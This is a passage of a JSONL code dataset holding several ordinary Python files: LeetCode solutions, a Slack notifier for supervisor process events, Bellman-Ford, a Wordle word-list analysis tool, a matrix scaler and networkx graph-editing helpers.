+/- one of the middle or middle parity\n for firstpart in (P-1, P, P+1):\n firstpart = str(firstpart)\n secondpart = firstpart[:-1] if L%2 else firstpart\n cands.append(firstpart + secondpart[::-1])\n\n result = None\n for cand in cands:\n if cand != S and not cand.startswith('00'):\n # if result is still null, take the cand for now\n # or if candidate is a smaller palindrome, take it. 
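\n # ('smaller' here means closer in absolute distance to the\n # original S, as measured by palindsize)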
\n if (result is None or palindsize(cand) < palindsize(result)):\n result = cand\n # if current cand palind size is the same with previous result\n # AND the absolute value of cand is smaller, take the cand\n elif palindsize(cand) == palindsize(result) and int(cand) < int(result):\n result = cand\n return result\n\n\n","repo_name":"tianchuliang/leetcode","sub_path":"oldcode/H_algo.py","file_name":"H_algo.py","file_ext":"py","file_size_in_byte":17602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28619245557","text":"#\n# @lc app=leetcode id=14 lang=python3\n#\n# [14] Longest Common Prefix\n#\n\n# @lc code=start\nfrom typing import List\n\n\nclass Solution:\n def longestCommonPrefix(self, strs: List[str]) -> str:\n l = list(zip(*strs))\n prefix = \"\"\n for i in l:\n if len(set(i))==1:\n prefix += i[0]\n else:\n break\n return prefix\n # print('hello')\n \n# @lc code=end\ns = Solution()\nstrs = [\"flower\", \"flow\", \"flight\"]\nres = s.longestCommonPrefix(strs)\nprint(res)\n","repo_name":"Anderbone/leetcode","sub_path":"Python/14.longest-common-prefix.py","file_name":"14.longest-common-prefix.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34332046977","text":"import copy\nimport os\nimport sys\nimport json\n\nfrom slack import WebClient, WebhookClient\nfrom superlance.process_state_monitor import ProcessStateMonitor\nfrom supervisor import childutils\n\n\nclass SuperSlacker(ProcessStateMonitor):\n SUPERVISOR_EVENTS = (\n 'STARTING', 'RUNNING', 'BACKOFF', 'STOPPING',\n 'FATAL', 'EXITED', 'STOPPED', 'UNKNOWN',\n )\n\n EVENTS_SLACK_COLORS = {\n \"PROCESS_STATE_STOPPED\": ':apple:',\n \"PROCESS_STATE_STARTING\": ':warning:',\n \"PROCESS_STATE_RUNNING\": ':green_apple:',\n \"PROCESS_STATE_BACKOFF\": ':apple:',\n \"PROCESS_STATE_STOPPING\": ':apple:',\n \"PROCESS_STATE_EXITED\": ':apple:',\n \"PROCESS_STATE_FATAL\": ':apple:',\n \"PROCESS_STATE_UNKNOWN\": ':apple:',\n }\n\n EVENTS_SHORT_NAMES = {\n \"PROCESS_STATE_STOPPED\": 'STOPPED',\n \"PROCESS_STATE_STARTING\": 'STARTING',\n \"PROCESS_STATE_RUNNING\": 'RUNNING',\n \"PROCESS_STATE_BACKOFF\": 'BACKOFF',\n \"PROCESS_STATE_STOPPING\": 'STOPPING',\n \"PROCESS_STATE_EXITED\": 'EXITED',\n \"PROCESS_STATE_FATAL\": 'FATAL',\n \"PROCESS_STATE_UNKNOWN\": 'UNKNOWN',\n }\n\n @classmethod\n def _get_opt_parser(cls):\n from optparse import OptionParser\n\n parser = OptionParser()\n parser.add_option(\"-t\", \"--token\", help=\"Slack Token\")\n parser.add_option(\"-c\", \"--channel\", help=\"Slack Channel\")\n parser.add_option(\"-w\", \"--webhook\", help=\"Slack WebHook URL\")\n parser.add_option(\"-i\", \"--icon\", default=':sos:',\n help=\"Slack emoji to be used as icon\")\n parser.add_option(\"-u\", \"--username\",\n default='superslacker', help=\"Slack username\")\n parser.add_option(\"-n\", \"--hostname\", help=\"System Hostname\")\n parser.add_option(\"-p\", \"--proxy\", help=\"Proxy server\")\n parser.add_option(\n \"--eventname\", default=\"TICK_60\", help=\"TICK_5 or TICK_60. Default TICK_60. How often to add messages into queue\")\n parser.add_option(\n \"--interval\", default=60, help=\"How often to flush message queue. Default 60sec\")\n parser.add_option(\n \"-e\", \"--events\", help=\"Supervisor event(s). 
Can be any, some or all of {} as comma separated values\".format(cls.SUPERVISOR_EVENTS))\n parser.add_option(\n \"--blacklist\", help=\"Comma-separated list of application for which not to send notifiactions\")\n parser.add_option(\n \"--whitelist\", help=\"Comma-separated list of application always to monitor\")\n\n return parser\n\n @classmethod\n def parse_cmd_line_options(cls):\n parser = cls._get_opt_parser()\n (options, args) = parser.parse_args()\n return options\n\n @classmethod\n def validate_cmd_line_options(cls, options):\n parser = cls._get_opt_parser()\n if not options.token and not options.webhook:\n parser.print_help()\n sys.exit(1)\n if options.token and options.webhook:\n parser.print_help()\n sys.exit(1)\n if not options.channel:\n parser.print_help()\n sys.exit(1)\n if not options.hostname:\n import socket\n options.hostname = socket.gethostname()\n\n validated = copy.copy(options)\n return validated\n\n @classmethod\n def get_cmd_line_options(cls):\n return cls.validate_cmd_line_options(cls.parse_cmd_line_options())\n\n @classmethod\n def create_from_cmd_line(cls):\n options = cls.get_cmd_line_options()\n\n if 'SUPERVISOR_SERVER_URL' not in os.environ:\n sys.stderr.write('Must run as a supervisor event listener\\n')\n sys.exit(1)\n\n return cls(**options.__dict__)\n\n def __init__(self, **kwargs):\n ProcessStateMonitor.__init__(self, **kwargs)\n self.channel = kwargs['channel']\n self.token = kwargs.get('token', None)\n self.now = kwargs.get('now', None)\n self.hostname = kwargs.get('hostname', None)\n self.webhook = kwargs.get('webhook', None)\n self.proxy = kwargs.get('proxy', None)\n self.icon = kwargs.get('icon')\n self.username = kwargs.get('username')\n self.eventname = kwargs.get('eventname', \"TICK_5\")\n self.interval = float(kwargs.get('interval', 60))/60\n self.process_state_events = ['PROCESS_STATE_{}'.format(status)\n for status in self.SUPERVISOR_EVENTS]\n\n if kwargs.get('events'):\n self.process_filter_events = [\n 'PROCESS_STATE_{}'.format(e.strip().upper())\n for e in kwargs.get('events', None).split(\",\")\n if e in self.SUPERVISOR_EVENTS\n ]\n else:\n self.process_filter_events = self.process_state_events\n\n if kwargs.get('blacklist'):\n self.process_blacklist = [\n '{}'.format(e.strip())\n for e in kwargs.get('blacklist', None).split(\",\")\n ]\n else:\n self.process_blacklist = []\n\n if kwargs.get('whitelist'):\n self.process_whitelist = [\n '{}'.format(e.strip())\n for e in kwargs.get('whitelist', None).split(\",\")\n ]\n else:\n self.process_whitelist = []\n\n def get_process_state_change_msg(self, headers, payload):\n pheaders, pdata = childutils.eventdata(payload + '\\n')\n return \"{hostname};{groupname}:{processname};{from_state};{event}\".format(\n hostname=self.hostname, event=headers['eventname'], **pheaders\n )\n\n def send_slack_notification(self, processname, hostname, eventname, from_state):\n payload = {\n 'channel': self.channel,\n 'username': self.username,\n 'icon_emoji': self.icon,\n 'blocks': [\n {\n \"type\": \"section\",\n \"text\": {\n \"type\": \"mrkdwn\",\n \"text\": \"{4} *{0}* @{1}: *{2}* from {3}\".format(processname,\n hostname,\n self.EVENTS_SHORT_NAMES[eventname],\n from_state,\n self.EVENTS_SLACK_COLORS[eventname])\n }\n }\n ]\n }\n if self.webhook:\n webhook = WebhookClient(url=self.webhook, proxy=self.proxy)\n webhook.send_dict(body=payload)\n elif self.token:\n slack = WebClient(token=self.token, proxy=self.proxy)\n slack.chat_postMessage(**payload)\n\n def send_batch_notification(self):\n for msg in 
self.batchmsgs:\n hostname, processname, from_state, eventname = msg.rsplit(';')\n processname = processname.split(\":\")[0]\n if processname in self.process_whitelist or \"all\".lower() in [x.lower() for x in self.process_whitelist]:\n self.send_slack_notification(\n processname, hostname, eventname, from_state)\n elif processname in self.process_blacklist or \"all\".lower() in [x.lower() for x in self.process_blacklist]:\n return\n else:\n if eventname in self.process_filter_events:\n self.send_slack_notification(\n processname, hostname, eventname, from_state)\n\n\ndef main():\n superslacker = SuperSlacker.create_from_cmd_line()\n superslacker.run()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"slara/superslacker","sub_path":"superslacker/superslacker.py","file_name":"superslacker.py","file_ext":"py","file_size_in_byte":7673,"program_lang":"python","lang":"en","doc_type":"code","stars":60,"dataset":"github-code","pt":"72"} +{"seq_id":"22921298140","text":"def Bellman_Ford(G, s):\n d = {}\n parent = {}\n for i in G:\n d[i] = float('inf')\n d[s] = 0\n for i in range(len(G)):\n for u in G:\n for v in G[u]:\n if d[v] > d[u] + G[u][v]:\n d[v] = d[u] + G[u][v]\n parent[v] = u\n for u in G:\n for v in G[u]:\n if d[v] > d[u] + G[u][v]:\n print('negative weight cycle')\n return d\n","repo_name":"ensermuyigezu/Algorithms","sub_path":"Graph/bellman_ford.py","file_name":"bellman_ford.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14013871545","text":"import os\nimport time\nimport string\nimport pandas as pd\nfrom tqdm import tqdm\n\n\n\nclass WordleMe():\n\n def __init__(self):\n\n self.value_correct = '🟩'\n self.value_wrong_position = '🟨'\n self.value_incorrect = '⬛️'\n\n\n with open('solutions_20220215.txt', 'r') as f:\n block_of_text = f.read()\n no_quotes = block_of_text.replace('\"','')\n self.solutions_sequence = no_quotes.split(',')\n self.solutions = sorted(self.solutions_sequence)\n self.solutions = [w.upper() for w in self.solutions]\n # print(f'Number of solutions: {len(self.solutions)}')\n\n with open('herrings_20220215.txt', 'r') as f:\n block_of_text = f.read()\n no_quotes = block_of_text.replace('\"','')\n self.herrings = no_quotes.split(',')\n self.herrings = [w.upper() for w in self.herrings]\n # print(f'Number of herrings: {len(self.herrings)}')\n\n\n\n def save_word_beginnings(self):\n\n beginnings = []\n\n for word in self.solutions:\n beginnings += [word[:2]]\n\n dfb = pd.DataFrame(beginnings, columns=['beginnings'])\n counts_beginnings = pd.DataFrame(dfb.groupby('beginnings').size(), columns=['N'])\n counts_beginnings['percentage'] = counts_beginnings['N'] / counts_beginnings['N'].sum()\n counts_beginnings['first_letter'] = counts_beginnings.index.str[0]\n counts_beginnings['second_letter'] = counts_beginnings.index.str[1]\n\n print(f'Possible beginnings: {len(counts_beginnings)}')\n print(counts_beginnings.sort_values(by='N', ascending=False).head(20))\n counts_beginnings.sort_values(by='N', ascending=False).to_clipboard()\n\n print('')\n\n\n def save_word_endings(self):\n endings = []\n\n for word in self.solutions:\n endings += [word[-2:]]\n\n dfe = pd.DataFrame(endings, columns=['endings'])\n counts_endings = pd.DataFrame(dfe.groupby('endings').size(), columns=['N'])\n counts_endings['percentage'] = counts_endings['N'] / counts_endings['N'].sum()\n counts_endings['fourth_letter'] = counts_endings.index.str[0]\n counts_endings['fifth_letter'] = 
counts_endings.index.str[1]\n\n print(f'Possible endings: {len(counts_endings)}')\n print(counts_endings.sort_values(by='N', ascending=False).head(20))\n # counts_endings.sort_values(by='N', ascending=False).to_clipboard()\n\n\n def save_sorted_list(self):\n \"\"\"\n Write the solution list in alphabetical order to a new file\n \"\"\"\n\n with open('solutions_20220215_sorted.txt', 'w') as f:\n f.write('\\n'.join(sorted(self.solutions)))\n\n with open('herrings_20220215_sorted.txt', 'w') as f:\n f.write('\\n'.join(sorted(self.herrings)))\n\n def frequency(self):\n\n df = pd.DataFrame(columns=['words_containing_letter'], index=list(string.ascii_uppercase))\n\n for c in string.ascii_uppercase:\n\n letter_in_word = 0\n for w in self.solutions:\n if c in w:\n letter_in_word += 1\n\n df.loc[c, 'words_containing_letter'] = letter_in_word\n\n\n df['perc'] = df['words_containing_letter'] / len(self.solutions)\n\n df = df.sort_values(by='perc', ascending=False)\n # print(df)\n # df.to_csv('most_common_letters.csv')\n\n return df\n\n\n def solution_with_common_letters(self):\n \"\"\"\n Solutions that contain 'orate', the most common letters\n \"\"\"\n\n for idx, word in enumerate(self.solutions):\n # print(''.join(sorted(word)))\n\n if ''.join(sorted(word)) == 'aeors':\n print(word)\n\n\n\n def solution_stats(self):\n \"\"\"\n Solutions that contain a lot of common letters\n \"\"\"\n\n freq = self.frequency()\n scores = pd.DataFrame(\n index=self.solutions\n , columns=[\n 'letter_freq_score'\n , 'num_unique'\n , 'num_vowels'\n , 'letter_0'\n , 'letter_1'\n , 'letter_2'\n , 'letter_3'\n , 'letter_4'\n ]\n )\n\n scores.index.name = 'solution'\n\n for idx, word in enumerate(self.solutions):\n word_score = 0\n unique_letters = []\n vowels = []\n\n for letter in word:\n word_score += freq.loc[letter, 'perc']\n\n if letter not in unique_letters:\n unique_letters += [letter]\n\n if letter in ['A', 'E', 'I', 'O', 'U']:\n vowels += [letter]\n\n # print(word)\n # print(unique_letters)\n # print()\n\n scores.loc[word, 'letter_freq_score'] = word_score\n scores.loc[word, 'num_unique'] = len(unique_letters)\n scores.loc[word, 'num_vowels'] = len(vowels)\n\n for position, letter in enumerate(word):\n scores.loc[word, f'letter_{position}'] = letter\n\n for character in string.ascii_uppercase:\n scores.loc[word, f'has_{character}'] = character in word\n\n for character in string.ascii_uppercase:\n scores.loc[word, f'count_{character}'] = self.count_letter_occurances_in_word(word, character)\n\n # print(scores[scores['num_unique'] == 5].sort_values(by='letter_freq_score', ascending=False).head(20))\n # print(scores[(scores['num_unique'] == 5) & (scores['num_vowels'] == 1)].sort_values(by='letter_freq_score', ascending=False).head(20))\n\n scores['difficulty_percentile'] = scores['letter_freq_score'].rank(pct=True, ascending=False)\n # print(scores.sort_values(by='letter_freq_score'))\n # print(scores.loc['ultra'])\n # scores.to_clipboard()\n\n unique_stats = pd.DataFrame(scores.groupby('num_unique').size(), columns=['N'])\n unique_stats['perc'] = unique_stats['N'] / unique_stats['N'].sum()\n print(unique_stats)\n\n scores.to_csv('scores.csv')\n\n\n\n def count_letter_occurances_in_word(self, word, letter):\n \"\"\"Return the number of times that 'letter' appears in the 'word' \"\"\"\n\n count_occurances = 0\n\n for j in range(5):\n if word[j] == letter:\n count_occurances += 1\n\n return count_occurances\n\n\n\n def difficulty_by_day(self):\n \"\"\"\n How difficult is every word?\n\n ulcer = 2022-02-11\n \"\"\"\n\n 
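# rank every solution by its letter-frequency score (lower = harder)\n 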
word_rank = pd.DataFrame(index=self.solutions, columns=['letter_freq_score', 'rank', 'percentile'])\n \n for word in self.solutions:\n\n word_rank.loc[word, 'letter_freq_score'] = 1\n\n\n\n def corpus_frequency(self):\n\n word_frequency = pd.read_excel('wordFrequency.xlsx', sheet_name='3 wordForms')\n\n in_word_list = 0\n for word in self.solutions:\n if word in word_frequency['word'].tolist():\n in_word_list += 1\n\n print(in_word_list / len(self.solutions))\n\n\n\n def previous_in_sequence(self):\n \"\"\"\n Is the sequence still the same? Check without spoiling an answer by revealing the answer from yesterday\n \"\"\"\n\n todays_solution = 'aroma'\n yesterdays_solution = self.solutions_sequence[self.solutions_sequence.index(todays_solution) - 1]\n print(f'yesterdays_solution: {yesterdays_solution}')\n\n\n\n def compare_two_lists(self, list_left, list_right):\n \n in_left_but_not_right = []\n\n for word in list_left:\n if word not in list_right:\n in_left_but_not_right += [word]\n\n print(f'in_left_but_not_right: {in_left_but_not_right} ({len(in_left_but_not_right)} words)')\n\n\n in_right_but_not_left = []\n\n for word in list_right:\n if word not in list_left:\n in_right_but_not_left += [word]\n\n print(f'in_right_but_not_left: {in_right_but_not_left} ({len(in_right_but_not_left)} words)')\n\n\n\n def compare_lists_to_current(self, comparison_date='20220215'):\n \"\"\"\n Compare a set of Wordle lists from comparison_date to the current lists\n \"\"\"\n\n with open(f'solutions_{comparison_date}.txt', 'r') as f:\n block_of_text = f.read()\n no_quotes = block_of_text.replace('\"','')\n solutions_sequence = no_quotes.split(',')\n solutions_sequence = [w.upper() for w in solutions_sequence]\n solutions_comparison = sorted(solutions_sequence)\n\n with open(f'herrings_{comparison_date}.txt', 'r') as f:\n block_of_text = f.read()\n no_quotes = block_of_text.replace('\"','')\n herrings_comparison = no_quotes.split(',')\n herrings_comparison = [w.upper() for w in herrings_comparison]\n\n print('\\nSolution changes:')\n self.compare_two_lists(solutions_comparison, self.solutions)\n print('\\nHerring changes:')\n self.compare_two_lists(herrings_comparison, self.herrings)\n print()\n\n\n\n def guess_analysis(self, guesses, solution=None, debug=False, terminal_format=True):\n \"\"\"\n For a list of guesses, show how well each guess performed at limiting the field of possible solutions.\n\n solution = the word that is the solution to the puzzle. If not given, assume the last guess is the solution\n \"\"\"\n\n print('\\n\\n\\n~~~~~ ~~~~~ Wordle Guess Analysis ~~~~~ ~~~~~')\n\n if not solution:\n solution = guesses[-1]\n\n solution = solution.upper()\n guesses = [g.upper() for g in guesses]\n\n psdf = pd.read_csv('scores.csv')\n psdf['possible'] = 1\n \n for guess_num, g in enumerate(guesses):\n print(f'\\nGuess {guess_num+1}: {g}')\n\n response = self.process_guess(solution, g)\n print(' ', end='')\n self.print_emoji(response)\n self.is_guess_playable(g)\n\n # self.is_guess_on_list(g)\n\n psdf, _ = self.eliminate_solutions(psdf, solution, g, verbose_es=True, debug=debug, terminal_format=terminal_format)\n\n\n\n def process_guess(self, solution, guess):\n \"\"\"\n Guess at a solution. 
Return green, yellow, or gray\n \"\"\"\n\n response = [self.value_incorrect] * 5\n\n unmatched_letters_in_solution = []\n\n for position, letter in enumerate(guess):\n if solution[position] == letter:\n response[position] = self.value_correct\n else:\n unmatched_letters_in_solution += [solution[position]]\n\n for position, letter in enumerate(guess):\n if response[position] == self.value_correct:\n continue\n elif letter in unmatched_letters_in_solution:\n response[position] = self.value_wrong_position\n \n return response\n\n\n\n def is_guess_playable(self, guess):\n \"\"\"\n Raise an exception if the guess is not on the lists of playable words\n \"\"\"\n\n if (guess not in self.solutions) and (guess not in self.herrings):\n raise Exception(f'\"{guess}\" is not a playable word.')\n\n\n\n def is_guess_on_list(self, guess):\n \"\"\"\n Print information about which list the guess is on.\n \"\"\"\n\n if (guess not in self.solutions) and (guess in self.herrings):\n print(f'\"{guess}\" is a playable word but not on the list of solutions, so it\\'s not an optimal guess.')\n\n elif guess in self.solutions:\n print(f'\"{guess}\" is on the list of solutions.')\n\n\n\n def print_emoji(self, emoji_sequence):\n \"\"\"\n Print the response emoji sequence to the terminal.\n \"\"\"\n\n for e in emoji_sequence:\n print(e, end='')\n\n print()\n\n\n\n def print_word_list(self, word_list, solution=None, max_chars_per_line=80, highlight_solution=False):\n \"\"\"\n Print a list of words in a pretty block\n \"\"\"\n\n chars_used = 0\n\n for idx, word in enumerate(word_list):\n\n if highlight_solution:\n\n if word == solution:\n print('>>>' + word + '<<<', end=' ')\n chars_used += len(word) + 6\n else:\n print(word, end=' ')\n chars_used += len(word) + 1\n\n\n print(word, end=' ')\n chars_used += len(word) + 1\n\n if chars_used >= max_chars_per_line:\n print()\n chars_used = 0\n\n\n print()\n\n\n\n def eliminate_solutions(self, psdf, solution, guess, verbose_es=False, debug=False, terminal_format=True):\n \"\"\"\n Show how many possible solutions this guess has eliminated\n \"\"\"\n\n before_guess_list = psdf[psdf['possible'] == 1]['solution'].tolist()\n before_guess_count = len(before_guess_list)\n\n if verbose_es:\n if guess != solution:\n if guess in before_guess_list:\n print(f'\"{guess}\" is on the list of possible solutions at the start of this round, well played!')\n else:\n print(f'\"{guess}\" is not on the list of possible solutions at the start of this round, so it\\'s not an optimal guess.')\n\n if guess in self.herrings:\n print(f'Additionally, \"{guess}\" will never be a solution, though it is a playable word.')\n\n response = self.process_guess(solution, guess)\n\n for position, status in enumerate(response):\n\n letter = guess[position]\n\n if status == self.value_correct:\n psdf.loc[psdf[f'letter_{position}'] != letter, 'possible'] = 0\n\n if debug:\n print(f'position {position}, guess \"{letter}\", value_correct')\n self.print_word_list(psdf[psdf['possible'] == 1]['solution'].tolist())\n\n elif status == self.value_wrong_position:\n psdf.loc[(psdf[f'has_{letter}'] == False) | (psdf[f'letter_{position}'] == letter), 'possible'] = 0\n\n if debug:\n print(f'position {position}, guess \"{letter}\", value_wrong_position')\n self.print_word_list(psdf[psdf['possible'] == 1]['solution'].tolist())\n\n elif status == self.value_incorrect:\n # This letter cannot be in the guessed position\n psdf.loc[psdf[f'letter_{position}'] == letter, 'possible'] = 0\n\n # Also loop through each position in the response. 
\n # If the value isn't green, then this incorrect letter cannot be in that position. \n # If the value is green, then it is possible for this incorrect letter to be in that position.\n\n for j in range(5):\n if response[j] != self.value_correct:\n psdf.loc[psdf[f'letter_{j}'] == letter, 'possible'] = 0\n\n if debug:\n print(f'position {position}, guess \"{letter}\", value_incorrect')\n self.print_word_list(psdf[psdf['possible'] == 1]['solution'].tolist())\n\n after_guess_count = psdf['possible'].sum()\n\n if after_guess_count == 0:\n raise Exception('No possible solutions remain. Something went wrong in the word elimination logic.')\n\n eliminated = before_guess_count - after_guess_count\n elim_perc = eliminated / before_guess_count\n\n if verbose_es:\n\n # If the guess is the solution AND the only possibility at this guess, skip this message\n if not (guess == solution and before_guess_count == 1):\n plural = 's' if before_guess_count > 1 else ''\n print(f'Guess \"{guess}\" eliminated {eliminated} of {before_guess_count} solution{plural} ({elim_perc:.1%})')\n\n if guess == solution:\n print(f'\"{guess}\" is correct!')\n else:\n noun = 's' if after_guess_count > 1 else ''\n verb = '' if after_guess_count > 1 else 's'\n print(f'{after_guess_count} solution{noun} remain{verb}: ')\n\n if terminal_format:\n max_chars_per_line=80\n else:\n max_chars_per_line=10000\n\n self.print_word_list(psdf[psdf['possible'] == 1]['solution'].tolist(), solution, max_chars_per_line=max_chars_per_line)\n\n return psdf, elim_perc\n\n\n\n def analyze_opening_guesses(self):\n \"\"\"\n Cycle through all opening guesses to see which consistently eliminate the most solutions\n\n Save output to CSV on each cycle for safety because this function takes like 8 hours to complete\n\n Each row is one possible solution\n Each column is a possible opening\n \"\"\"\n\n # Create the output DataFrame if it doesn't already exist\n output_filename = 'opening_df.csv'\n\n if os.path.exists(output_filename):\n opening_df = pd.read_csv(output_filename, index_col='solution')\n else:\n opening_df = pd.DataFrame(index=self.solutions, columns=self.solutions)\n opening_df.index.name = 'solution'\n opening_df.columns.name = 'opening'\n\n\n psdf_static = pd.read_csv('scores.csv')\n psdf_static['possible'] = 1\n\n # Find solutions in the DataFrame that have not yet had openings tested against them\n words_tested = opening_df[self.solutions].notnull().sum(axis=1)\n words_remaining = words_tested[words_tested == 0].index.tolist()\n\n for idx, solution in enumerate(words_remaining):\n\n print(f'Testing best opening word for: {solution}')\n\n opening_elim_row = self.one_guess_all_solutions(solution, verbose_ogas=False, subset_only=False).transpose().values\n opening_df.loc[solution, :] = opening_elim_row[0]\n\n opening_df.to_csv(output_filename)\n # opening_df.to_csv(output_filename, index_label='solution')\n\n # if idx % 50 == 0:\n # print('Sleeping for 3 minutes...')\n # time.sleep(180)\n\n if idx > 3:\n break\n\n print('Opening guess dataset complete.')\n\n\n\n def one_guess_all_solutions(self, guess, verbose_ogas=False, subset_only=False):\n \"\"\"\n Run one opening guess through all the possible solutions as an opening word\n \"\"\"\n\n psdf = pd.read_csv('scores.csv')\n psdf['possible'] = 1\n guess_elim_perc = pd.DataFrame(index=self.solutions, columns=[guess])\n\n if verbose_ogas:\n iterator = tqdm(self.solutions)\n else:\n iterator = self.solutions\n\n for idx, solution in enumerate(iterator):\n\n if subset_only and idx > 10:\n break\n\n 
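# each pass below replays the elimination logic for one hypothetical\n # solution, so a full sweep costs roughly |solutions| scans of the\n # scores table\n 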
# Ignore situations where the guess is perfect\n if guess == solution:\n continue\n\n _, elim_perc = wm.eliminate_solutions(psdf.copy(), solution, guess, verbose_es=False)\n guess_elim_perc.loc[solution, guess] = elim_perc\n\n if verbose_ogas: \n print(f'On average, guess \"{guess}\" eliminates {guess_elim_perc[guess].mean():.1%} of solutions when played as the first guess.')\n\n # todo: make a histogram\n\n return guess_elim_perc\n\n\n\n def best_opening_word(self):\n\n df = pd.read_csv('opening_df_complete.csv', index_col='solution')\n\n openings_median = df[self.solutions].median(numeric_only=True, axis=0)\n openings_median.name = 'elim_perc_median'\n openings_mean = df[self.solutions].mean(numeric_only=True, axis=0)\n openings_mean.name = 'elim_perc_mean'\n\n openings_stats = pd.merge(openings_median, openings_mean, how='inner', left_index=True, right_index=True)\n openings_stats['elim_perc_median_rank'] = openings_stats['elim_perc_median'].rank(ascending=False)\n openings_stats['elim_perc_mean_rank'] = openings_stats['elim_perc_mean'].rank(ascending=False)\n \n openings_stats['elim_more_than_50'] = (df[self.solutions] > 0.5).sum(axis=0) / len(df)\n openings_stats['elim_more_than_50_rank'] = openings_stats['elim_more_than_50'].rank(ascending=False)\n \n openings_stats.index.name = 'guess'\n output_columns = [\n 'elim_perc_mean'\n , 'elim_perc_mean_rank'\n , 'elim_perc_median'\n , 'elim_perc_median_rank'\n , 'elim_more_than_50'\n , 'elim_more_than_50_rank'\n ]\n openings_stats[output_columns].sort_values(by=['elim_more_than_50_rank', 'elim_perc_mean_rank']).to_csv('opening_stats.csv')\n print('Stats saved to: opening_stats.csv')\n\n # print(sum(df['RAISE'] < 0.6))\n\n\n\n def share_four_letters(self):\n \"\"\"\n Identify groups of solutions that share 4 letters with each other\n\n This is working well for first and last. 
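Pairs like\n STONE and ATONE, for instance, fall into the same last-four group. 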
But how to handle clusters like SMELT and SPELT?\n \"\"\"\n\n psdf = pd.read_csv('scores.csv', index_col='solution')\n psdf['match_first_four'] = None\n psdf['match_first_four_count'] = None\n psdf['match_last_four'] = None\n psdf['match_last_four_count'] = None\n\n for solution in tqdm(self.solutions):\n match_first_four = [solution]\n match_last_four = [solution]\n \n for comparison in self.solutions:\n\n if comparison == solution:\n continue\n\n if solution[:4] == comparison[:4]:\n match_first_four += [comparison]\n\n if solution[-4:] == comparison[-4:]:\n match_last_four += [comparison]\n\n psdf.loc[solution, 'match_first_four'] = ', '.join(sorted(match_first_four))\n psdf.loc[solution, 'match_first_four_count'] = len(match_first_four)\n psdf.loc[solution, 'match_last_four'] = ', '.join(sorted(match_last_four))\n psdf.loc[solution, 'match_last_four_count'] = len(match_last_four)\n\n psdf[['match_first_four', 'match_first_four_count', 'match_last_four', 'match_last_four_count']].to_csv('share_four_letters.csv')\n\n\n\n def cluster_four_letters(self):\n\n psdf = pd.read_csv('scores.csv', index_col='solution')\n\n cluster_long = pd.DataFrame(columns=['cluster', 'word'])\n\n for solution in tqdm(self.solutions):\n\n for comparison in self.solutions:\n\n if comparison == solution:\n continue\n\n letters_shared = 0\n shared_list = ['_'] * 5\n\n for i in range(5):\n if solution[i] == comparison[i]:\n letters_shared += 1\n shared_list[i] = solution[i]\n\n if letters_shared == 4:\n\n shared_word = ''.join(shared_list)\n new_row = {'cluster': shared_word, 'word': comparison}\n cluster_long = cluster_long.append(new_row, ignore_index=True)\n\n # if len(cluster_long) > 20:\n # break\n\n cluster_long = cluster_long.sort_values(by='word').drop_duplicates()\n cluster_wide = cluster_long.groupby('cluster').agg(\n num_words=('cluster', 'size')\n , solution_list=('word', ', '.join)\n )\n print(cluster_wide.sort_values(by='num_words', ascending=False))\n # cluster_wide.to_csv('share_four_letters.csv')\n\n\n\n\n\nif __name__ == '__main__':\n\n wm = WordleMe()\n\n # wm.solution_with_common_letters()\n # wm.frequency()\n\n # wm.solution_stats()\n \n # wm.corpus_frequency()\n\n # wm.previous_in_sequence()\n\n # wm.compare_lists_to_current()\n\n # wm.save_sorted_list()\n\n # wm.guess_analysis(['arise', 'white', 'glide', 'olive']) # Devin 2022-04-23\n\n\n\n # wm.analyze_opening_guesses()\n wm.best_opening_word()\n\n\n # wm.one_guess_all_solutions('RAISE', verbose_ogas=True)\n # wm.one_guess_all_solutions('NOISE', verbose_ogas=True)\n # wm.one_guess_all_solutions('CABLE', verbose_ogas=True)\n\n # wm.share_four_letters()\n # wm.cluster_four_letters()\n\n \n\n # todo: histogram of positions of letters\n # todo: maybe a difficulty score of each solution based on the percentage of solutions eliminated\n # from each opening guess. 
like, opposite axis mean of the best opening word\n\n\n","repo_name":"devinbrady/wordle-analysis","sub_path":"wordle.py","file_name":"wordle.py","file_ext":"py","file_size_in_byte":24274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"75020933031","text":"'''PSCP Program'''\ndef main(row, col):\n '''8390-ScaledMatrix 30/10/2022'''\n mat, norm, count = [float(input()) for _ in range(row*col)], [], 0\n mat_stats = max(mat), min(mat)\n for i in mat:\n norm.append((i-mat_stats[1])/(mat_stats[0]-mat_stats[1]))\n for _ in range(row):\n for _ in range(col):\n print('%.2f' % norm[count], end=' ')\n count += 1\n print()\nmain(int(input()), int(input()))\n","repo_name":"Maldin0/Python","sub_path":"213-ScaledMatrix.py","file_name":"213-ScaledMatrix.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"30517452130","text":"import networkx as nx\nimport random \n\ndef remove_node(subgraph,n_nodes=1):\n mapping = {node:node for i, node in enumerate(subgraph.nodes())}\n subG = nx.relabel_nodes(subgraph,mapping)\n nodes=[]\n prob=[]\n for node in subG.nodes():\n nodes.append(node)\n prob.append(subG.degree(node))\n \n removed_node = random.sample(nodes, min(n_nodes,len(nodes)))\n subG.remove_nodes_from(removed_node)\n\n return subG \n\ndef remove_edge(subgraph,n_edges=1):\n mapping = {node:node for i, node in enumerate(subgraph.nodes())}\n subG = nx.relabel_nodes(subgraph,mapping)\n removed_edges= [edge for edge in subG.edges()]\n removed_edge = random.sample(removed_edges, min(n_edges, len(removed_edges)))\n subG.remove_edges_from(removed_edge)\n return subG \n\ndef add_node(subgraph,n_edges=1):\n\n return subgraph \n\ndef add_edge(subgraph,n_edges=1):\n mapping= {node:node for i, node in enumerate(subgraph.nodes())}\n subG = nx.relabel_nodes(subgraph,mapping)\n added_edges = []\n for i in subG.nodes():\n for j in subG.nodes():\n if i==j or (i,j) in subG.edges(): continue\n added_edges.append((i,j))\n added_edge = random.choice(added_edges)\n subG.add_edges_from([added_edge])\n return subG 